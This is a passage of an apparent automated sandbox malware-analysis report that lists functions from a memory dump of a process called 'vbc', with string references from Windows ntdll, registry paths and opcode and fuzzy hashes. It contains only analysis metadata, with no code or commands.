                                                                                    • Opcode ID: ab2e609d124d93d98622424103cdebe143efca85778a74880503e9ead64dce7a
                                                                                    • Instruction ID: 19233c054a9d8d239dd627f1d140c78d4d96a2c960a62b33526b93757aef6124
                                                                                    • Opcode Fuzzy Hash: ab2e609d124d93d98622424103cdebe143efca85778a74880503e9ead64dce7a
                                                                                    • Instruction Fuzzy Hash: 0651D4765083459BCB14DF64C448ABBBBEABF88718F14096EFD85D7250E734DE0487A2
                                                                                    Function 058BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 058F82DE
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058F82E8
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 058F82D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    • Opcode ID: 35ac46c6d3b845b12ebd4e0d8ef8e4132a2c7e0dd9fec565cdba04d2346aa4af
                                                                                    • Instruction ID: 9af11115724d5fcbbf04e9af59175646d57475e88c9e4078bef265e568e0a82a
                                                                                    • Opcode Fuzzy Hash: 35ac46c6d3b845b12ebd4e0d8ef8e4132a2c7e0dd9fec565cdba04d2346aa4af
                                                                                    • Instruction Fuzzy Hash: 6F41D371659308EBD720EB68D849F9B7BE8FF48650F04492AFD45D7250EB74EC008B96
                                                                                    Function 0593C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 0593C1F1
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0593C1C5
                                                                                    • PreferredUILanguages, xrefs: 0593C212
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    • Opcode ID: 4ac5ab6c96f1e9bb25484e849a18acdee0b68d968f3f4477f3c00991e324b301
                                                                                    • Instruction ID: 17bd66a61b1da638eb65b9feeb7be958575eb33e84c99cf9df0f9ed6be771ffc
                                                                                    • Opcode Fuzzy Hash: 4ac5ab6c96f1e9bb25484e849a18acdee0b68d968f3f4477f3c00991e324b301
                                                                                    • Instruction Fuzzy Hash: 3C413872A00619EBDF11DAD8C886BEEBBBDAF04700F14406AE906F7280D774DE448B91
                                                                                    Function 05904755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 0590488F
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 05904899
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05904888
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    • Opcode ID: d2e5c9eb8705f088f4b1ef5dffc7dd0b0fac0735f48873c3f60b2247cf946758
                                                                                    • Instruction ID: c1aee1d1b81a7d274e1db3723e00781c1c2193631050f0803697b754bf4617cf
                                                                                    • Opcode Fuzzy Hash: d2e5c9eb8705f088f4b1ef5dffc7dd0b0fac0735f48873c3f60b2247cf946758
                                                                                    • Instruction Fuzzy Hash: CC41AE32A086509FCF21CE68D840A267BEABF89A50F091D69EE4DD7291D734E800CB91
                                                                                    Function 05914144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    • Opcode ID: 812be6cedb71086ad5c0136932f9fbd4d672aa0e33cd84c21db4569e97af5c53
                                                                                    • Instruction ID: 844f20726f169e3a493b516a7aac5bbf3041959a838883553dcd181327588042
                                                                                    • Opcode Fuzzy Hash: 812be6cedb71086ad5c0136932f9fbd4d672aa0e33cd84c21db4569e97af5c53
                                                                                    • Instruction Fuzzy Hash: 7C41F232A0436C8BEF25DB98C944BADB7B9FF99340F240859DD06EF781DA348941CB55
                                                                                    Function 059020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpInitializationFailure, xrefs: 059020FA
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 05902104
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 059020F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    • Opcode ID: df7b40ae5c25b7cec68072231f485d8e31b1dcb1a17578a9b9d912589ea6aeee
                                                                                    • Instruction ID: 9f0e6e4d10bc5a9fce090ead9893f46305ffc189a4cf089adf85c9f3caec8fec
                                                                                    • Opcode Fuzzy Hash: df7b40ae5c25b7cec68072231f485d8e31b1dcb1a17578a9b9d912589ea6aeee
                                                                                    • Instruction Fuzzy Hash: 74F0F434640308AFDB14E60CCD4BFA93BACEB40A54F440495FA00AB281D6B4A900DA91
                                                                                    Function 058903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    • Opcode ID: e11e92f48cc6b2f8199f6ae3daceaec14bb5565798f10c8e45802ecd97c0b79a
                                                                                    • Instruction ID: 767513f7e278b4cf63254123e1ea12a76e5f5a4870eb012f607491de0be4160b
                                                                                    • Opcode Fuzzy Hash: e11e92f48cc6b2f8199f6ae3daceaec14bb5565798f10c8e45802ecd97c0b79a
                                                                                    • Instruction Fuzzy Hash: 07713971A002499FDF05DFA8C998BAEB7F8BF48704F144465E905EB251EA34ED01CBA1
                                                                                    Function 0590CEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0590CFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8
                                                                                    • String ID: @
                                                                                    • API String ID: 4062629308-2766056989
                                                                                    • Opcode ID: 7a1574f85fdf4d8345b3303d649a8e5d3dcbc5a0e8dd9c1c74528f9a652c8d4f
                                                                                    • Instruction ID: 4b701a101db5bd133c7178a066f3a25dc7e60d64736c764cd4334961eb41b63e
                                                                                    • Opcode Fuzzy Hash: 7a1574f85fdf4d8345b3303d649a8e5d3dcbc5a0e8dd9c1c74528f9a652c8d4f
                                                                                    • Instruction Fuzzy Hash: B241B171A04318DFDB25DFA9C844AAEBBB8FF44B00F04592AE905DB294D730DC01DB62
                                                                                    Function 0594A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction ID: d9c01c37329303cf9d0180495946edfcccae7fadcb605b40b72fdf989de78128
                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction Fuzzy Hash: 9BC19F312483469BDB25CF28C845F6BBBEABFC4358F084A2DF5968A290D774E905CF51
                                                                                    Function 05922F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 05923011
                                                                                    • , xrefs: 059232B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                    • API String ID: 0-4088147954
                                                                                    • Opcode ID: 4003f226dc1a369a5dffbd9fc913d9f96dcd0db03f170ae32ffb2e6cc0cce8dc
                                                                                    • Instruction ID: 30227faa7d6948130d57b6fe844e1d1f8b36fb71d0fc7637b4f4833a284618a8
                                                                                    • Opcode Fuzzy Hash: 4003f226dc1a369a5dffbd9fc913d9f96dcd0db03f170ae32ffb2e6cc0cce8dc
                                                                                    • Instruction Fuzzy Hash: D8C19E316083519FDB20CF25C484B6BB7EABF88714F044D1EF9859B248EB78E945CB92
                                                                                    Function 058FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 6db1e33e61e60442d77dffe70bd5044f8aefe0c04162db9ba64b48e4cccaed4f
                                                                                    • Instruction ID: 58d77152bb2309fbcea8365aa13916cb22c2509e9c1b8f81a8143c3560405e48
                                                                                    • Opcode Fuzzy Hash: 6db1e33e61e60442d77dffe70bd5044f8aefe0c04162db9ba64b48e4cccaed4f
                                                                                    • Instruction Fuzzy Hash: 3A614A71E143089FDB64DFA89845BAEBBB9FB48704F14406DEA49EB261D731ED40CB50
                                                                                    Function 0588AC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpResGetMappingSize Exit, xrefs: 0588AC7C
                                                                                    • LdrpResGetMappingSize Enter, xrefs: 0588AC6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                    • API String ID: 0-1497657909
                                                                                    • Opcode ID: 52cdd39a87da761f2fcacfc0b3faaaf7ad15ed91d885ac7eaeaf740d7361d584
                                                                                    • Instruction ID: e9eb5639c945d00ede2912a1a786077518b733f7c6dae7fe29e3c54a087b57d8
                                                                                    • Opcode Fuzzy Hash: 52cdd39a87da761f2fcacfc0b3faaaf7ad15ed91d885ac7eaeaf740d7361d584
                                                                                    • Instruction Fuzzy Hash: C0619E71A046499BDB29EFA8C840BBDB7B6FF45725F04096AEC01EB290DB74ED40C760
                                                                                    Function 059243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    • Opcode ID: a7e9df6508dc14125bdd8be38ad81e02eff36e8fc4d7fdf9ff587838409ef31d
                                                                                    • Instruction ID: 3718afa44c5eaef32abf0b2ccfc4e31857bc086c0b3dfb005c5fb82dcbc81b19
                                                                                    • Opcode Fuzzy Hash: a7e9df6508dc14125bdd8be38ad81e02eff36e8fc4d7fdf9ff587838409ef31d
                                                                                    • Instruction Fuzzy Hash: 1F513871E0062DAEDF11DFA9CC84EEEBBBCEB44654F100529E905EB294DA709D058B60
                                                                                    Function 058B4C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$Flst
                                                                                    • API String ID: 0-758220159
                                                                                    • Opcode ID: eb86b7b642d0aec4ce9ffbf1b24da8bed07131e8d94eb9f12e21141367e04578
                                                                                    • Instruction ID: c10b1833ab380603ebed0c58ad524e02dff1531a743c6585ea49b3aa7f050425
                                                                                    • Opcode Fuzzy Hash: eb86b7b642d0aec4ce9ffbf1b24da8bed07131e8d94eb9f12e21141367e04578
                                                                                    • Instruction Fuzzy Hash: 9B518171E012088BDF25CF99C445AB9FBFAFF44714F18842AD949DB262EBB09D45CB80
                                                                                    Function 058804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0588063D
                                                                                    • kLsE, xrefs: 05880540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    • Opcode ID: f3f993060b1703c30fece8c9b242bf73e05f3b18f450a5f70c4dd16c76eeb897
                                                                                    • Instruction ID: c4f8d9e4760b3054c8f4f02e782565a1cdea48fccaeeda1bf3bd4d633afe79e0
                                                                                    • Opcode Fuzzy Hash: f3f993060b1703c30fece8c9b242bf73e05f3b18f450a5f70c4dd16c76eeb897
                                                                                    • Instruction Fuzzy Hash: FB516B71604746CBC724EF69C548AB7B7E5FF84304F04483EE99AC7240E7749949CBA2
                                                                                    Function 058B2E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 058F2807
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 058F280C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                    • API String ID: 0-2104531740
                                                                                    • Opcode ID: bf76009a229f39d4efbf6e767269c7f874bc9459ae22d2ba8e38b94f71578c7c
                                                                                    • Instruction ID: 5cd47bcc916ce014bf17a1e2c00b3e97040b14432960a483126d95e8347ddc10
                                                                                    • Opcode Fuzzy Hash: bf76009a229f39d4efbf6e767269c7f874bc9459ae22d2ba8e38b94f71578c7c
                                                                                    • Instruction Fuzzy Hash: 9541B03A604615EBD724DF55C840EAAB7AAFF98B14F24802DED46DB740D770ED41CBA0
                                                                                    Function 0588A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0588A2FB
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0588A309
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: e0977281e23a14a377ff8e560c94b3537a60b7968ec1a1cee8d6541743f02108
                                                                                    • Instruction ID: 19acec79ec4fc8a17638cdc79c597e3233b6fdb75c6d99fd9e7d63dc31f6e742
                                                                                    • Opcode Fuzzy Hash: e0977281e23a14a377ff8e560c94b3537a60b7968ec1a1cee8d6541743f02108
                                                                                    • Instruction Fuzzy Hash: 3A41CD35A04649CBDB29EF59C844B7EB7B9FF85324F1440A6EC02DB690E635ED00CB40
                                                                                    Function 058C0FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 058C1050
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 058C1025
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                    • API String ID: 0-2976085014
                                                                                    • Opcode ID: 1f1c3518ef1f584c2cda9a23ecc1a7ae721e9e40687ff9f2863e655d98251ebf
                                                                                    • Instruction ID: 4f2e96367396e41b190ce8a908d4462abff6b3ae0fd9c50d53e64698496036a7
                                                                                    • Opcode Fuzzy Hash: 1f1c3518ef1f584c2cda9a23ecc1a7ae721e9e40687ff9f2863e655d98251ebf
                                                                                    • Instruction Fuzzy Hash: 73318472A00648AFDB12EB99CC98F9FBFB9EB84750F010469E901E7250DB75DD01CBA1
                                                                                    Function 058BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: 94eebf268af24d1549aac170d8ac72a92997bdacb8f1495755db70f85375305b
                                                                                    • Instruction ID: 202f51158c869a75c14b9cb57a58bf9cd9d3cf269ff73c2ba7ae5311dc597761
                                                                                    • Opcode Fuzzy Hash: 94eebf268af24d1549aac170d8ac72a92997bdacb8f1495755db70f85375305b
                                                                                    • Instruction Fuzzy Hash: 1601F4B2254704AFE311DF18CD4AF667BE8E755B25F008939B948C7290EB78ED04CB4A
                                                                                    Function 0588C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: 14120ca3f09c9fbc6425cd049047efbee926fb129655eeb2698358cbfef7545b
                                                                                    • Instruction ID: 2f29709f1d34cb7c5361b266f178d8d92e7e56b8802182451c9a18992150ca7e
                                                                                    • Opcode Fuzzy Hash: 14120ca3f09c9fbc6425cd049047efbee926fb129655eeb2698358cbfef7545b
                                                                                    • Instruction Fuzzy Hash: 2D824875E052188BDB24EFA9C984BBDB7B2FF48314F148169EC5AEB294D730AD41CB50
                                                                                    Function 05882FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PATH
                                                                                    • API String ID: 0-1036084923
                                                                                    • Opcode ID: bea9c10713e2e854c0b3521822c72253e7520a53d8c06e03bcb73d0a72435634
                                                                                    • Instruction ID: 48f4aace5cd81059ad85913a9035db5a08672ee041221b37ab4c8ca87c73cd85
                                                                                    • Opcode Fuzzy Hash: bea9c10713e2e854c0b3521822c72253e7520a53d8c06e03bcb73d0a72435634
                                                                                    • Instruction Fuzzy Hash: CFF18D71A14218DBCB25EF98DC81ABEBBB5FF48B00F54442AF845EB250DB34AD41CB65
                                                                                    Function 0591CC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w
                                                                                    • API String ID: 0-476252946
                                                                                    • Opcode ID: 74f84d22b18d353197f22ab17c01d991096f1b0d89d9b42b794867deabb5980f
                                                                                    • Instruction ID: 7b3df4b8b296e4a70cf93a218aa34a691c29f5659afffd22da7b61e1538d04d5
                                                                                    • Opcode Fuzzy Hash: 74f84d22b18d353197f22ab17c01d991096f1b0d89d9b42b794867deabb5980f
                                                                                    • Instruction Fuzzy Hash: 3BD1C034A44229ABDB24CF64C442ABEFBB6FF44700F54C459EC9A9B241E335ED92C758
                                                                                    Function 05924C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                    • Instruction ID: 60d234cd437279269e19354a4474d496d0127b84cbf31a3899b692956e3c635a
                                                                                    • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                    • Instruction Fuzzy Hash: 54A15CB5A0421AAFDF15DFA8C880EAEBBB9FF58740F144429E91AE7254E7709D40CB50
                                                                                    Function 05906420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: cf63a02d5d65d4c8783b343efd1ec5a8ba27ddcdc616ba06b241389a1b796c08
                                                                                    • Instruction ID: 92c38845f7fc0acacc0d2ad24798034ccc13f2be788022be07997eb2686c1c1f
                                                                                    • Opcode Fuzzy Hash: cf63a02d5d65d4c8783b343efd1ec5a8ba27ddcdc616ba06b241389a1b796c08
                                                                                    • Instruction Fuzzy Hash: B5915272A00219AFEB21DB98CC85FAE77B9EF04B50F140465FA01EB190DB75ED00CBA5
                                                                                    Function 0592E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: ad4954c1f25180822d8743feffd62dff6a8c460d3e8269d39bbeb7045c586b12
                                                                                    • Instruction ID: 0dbfd0e4fff1abeaf1b3f7e409ef1937e36a96f550eed6b6832ea83ce81828fe
                                                                                    • Opcode Fuzzy Hash: ad4954c1f25180822d8743feffd62dff6a8c460d3e8269d39bbeb7045c586b12
                                                                                    • Instruction Fuzzy Hash: 4B917E32A00618AADF26DBA5D898FBEBB7EEF45740F140029F905A7254EB749D01CB91
                                                                                    Function 058BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    • Opcode ID: 67d5e6b0df7fcb79d83b6997e9453b0859775a7378a0254b181acbe4552a91f9
                                                                                    • Instruction ID: 0c7539c9bf756afad445bfe8ca7fcd496506b45a00e2ecf3b95d8ca6125f31d7
                                                                                    • Opcode Fuzzy Hash: 67d5e6b0df7fcb79d83b6997e9453b0859775a7378a0254b181acbe4552a91f9
                                                                                    • Instruction Fuzzy Hash: 08716C75E0421ADFDF28CF9AD591AADBBB2BF48700F14822EE906E7240E7719D41CB50
                                                                                    Function 0589E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
